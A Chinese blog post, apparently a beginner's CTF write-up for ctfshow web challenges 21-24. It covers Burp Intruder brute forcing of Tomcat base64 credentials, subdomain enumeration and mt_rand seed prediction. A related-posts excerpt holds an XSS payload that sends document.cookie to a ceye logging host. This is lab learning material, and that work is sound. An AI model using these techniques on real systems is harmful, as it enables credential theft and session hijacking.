web入门——ctfshow(21-28)爆破

已于 2022-12-03 17:44:46 修改
阅读量463 收藏 1
点赞数 1
文章标签: 前端 java web 学习
于 2022-12-03 14:04:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73668856/article/details/128160573
版权

web21

爆破什么的,都是基操

Hint1

考点tomcat 认证爆破之custom iterator使用 tomcat 认证爆破之custom iterator使用 - 007NBqaq - 博客园 下载密码字典抓包,通过burpsuite暴力破解

Payload set ---->custom iterator(自定义迭代器)

需要进行base64编码;payload processing 进行编码设置

取消Palyload Encoding编码 因为在进行base64加密的时候在最后可能存在 == 这样就会影响base64 加密的结果

——————————————————————————————————————————

开始解题,进入页面,用户密码都填admin,看到加密方式为base64

 且格式为      user:password

接着就是工具的使用,进入instuder-->payloads-->custom literator(迭代器)

 接着

position 1

position 2

 position 3

设置

直接attack

没用。。。啊啊啊啊啊啊啊啊啊

避坑,这里好像要有两个$

 

 

 成功,ohhhhhhhhhhhhhh

web22 

域名也可以爆破的,试试爆破这个ctf.show的子域名

 域名更新后,flag.ctf.show域名失效

在线子域名查询

web23

还爆破?这么多代码,告辞!

打开还真是一堆代码,没有思路,看别人的wp

要用到python或php写脚本爆破,目前还没有能力写脚本,以后再来试试,

先明白这种思路,溜了溜了

web24

爆个🔨

 

mt_scrand(seed)这个函数的意思,是通过分发seed种子,然后种子有了后,靠mt_rand()生成随机 数。

intval() 函数用于获取变量的整数值。

并且如果设置了 seed参数 生成的随机数就是伪随机数,意思就是每次生成的随机数 是一样的

因此一般不设定seed固定值。

通过跑php脚本

得      url/?r=1155388967       

web25

_MOB_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
渗透测试-ctfshow 爆破(web入门
保持微笑的博客
12-29 4856
渗透测试-ctfshow 爆破(web入门
ctfshow-web入门——爆破web21-web28
m0_62905745的博客
04-14 1894
本篇文章是ctfshow的web入门部分的爆破wp(web21-web 28),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习
【CTF练习】Ctfshow入门 爆破21-24)
最新发布
Lush_hair_Dl的博客
03-10 1628
爆破题常用的工具就是bp的Intruder模块,将抓到的包发送到Repeater(点击action会有相应选项),用字典爆破:本题是一个登录窗口,首先第一步就是先输入用户名为:admin(一般没有额外提示就这么猜),密码随便输(此处输入111),然后登录。这一过程的目的是为了抓包查看爆破点有的时候抓包会直接看到用户名和密码的位置,这里就不能直接看到,此处将用户名和密码进行base64加密(对于一串字符后有=,基本就要猜测这一串数据是否是base64加密,解密看看是否有什么信息),解密后发现是。
ctfshow XSS漏洞web316-328
m0_62584974的博客
04-07 1746
2022/4/7 Web316 XSS 反射性XSS 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! CEYE - Monitor service for security testing 先在这个网站注册一个账号获得一个临时的域名 红框内的是临时的域名 然后在方框中输入: <script>varimg=document.createElement("img");img.src="http://你的ceye地址/"+document.co..
CTFshow web入门 web28~web40 命令执行
qq_56815564的博客
04-12 437
这里可以使用的是data伪协议 data://text/plain,这个相当于执行了php语句,后面跟上的 “.php” 因为前面的php语句已经闭合了,所以后面跟上的 “.php” 会被当成html页面直接显示在页面上,起不到什么作用。很明显,flag应该就在flag.php里,但不能直接访问flag.php 因为不能直接输入字符flag,被过滤了。而filter协议和php://input如果要传的话,必须出现具体的文件名,而flag被过滤了,所以不能用。另外这里的eval($c);
CTFSHOW系列-web28(爆破-目录爆破爆破)
siu~
12-06 476
CTFSHOW系列解题思路
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
AccentRarPasswordRecovery-rar爆破.zip
05-03
AccentRarPasswordRecovery-rar爆破.zip
CTFshow-Web入门-Web21-28爆破完结篇)
m0_61155226的博客
03-21 446
CTFshow-Web入门21-28
CTFshow web入门爆破web21-web28
小白的博客
05-10 494
爆破在理解题目意思以及正确构造爆破payload内容还是很简单的。
CTFshow(web21-web28)
qing_chuan_的博客
05-26 285
提示:从 PHP 4.2.0 开始,随机数生成器自动播种,因此没有必要使用该函数 因此不需要播种,并且如果设置了 seed参数 生成的随机数就是伪随机数,意思就是每次生成的随机数 是一样的。自定义迭代器可以自定义拼接方式,position的位置即为我们的拼接方式,根据上述base64解码的tomcat密码的格式:用户名:密码 ----->则position的位数为3。Payload set ---->custom iterator(自定义迭代器)------>position 3------>输入字典。
ctfshow web入门爆破web21-28wp
kinakouni的博客
02-21 423
入门几个月的萌新CTFer,记录下自己做题的wp。
ctfshow web入门21-28爆破
2202_75317918的博客
09-23 472
ctfshow web入门21-28爆破
CTFSHOW-爆破
Yb_140的博客
04-06 2321
web21 首先下载网站提供的zip 直接通过burp爆破 随便输入账号和密码,使用提供的字典,进行爆破 经过base64解码 为我们输入的账号密码 设置 爆破完成,得到Flag web22 提示:爆破子域名ctf.show 使用在线查询工具:在线子域名查询 逐个访问 发现 得到Flag web23 由代码可以知道token被md5加密了,分析可知 当第二位等于第十五位等于第十八位,第二位加上...
ctfshow-web入门爆破
08-30
在ctfshow-web入门爆破中,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码中的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回数据包,可以在爆破过程中去掉2.txt,只爆破目录即可。可以通过查看返回的数据包来获取目录中的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ctfshow web185 正则爆破脚本](https://download.csdn.net/download/eason612/86793758)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CTFshow web入门——爆破](https://blog.csdn.net/qq_49480008/article/details/112991503)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_MOB_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值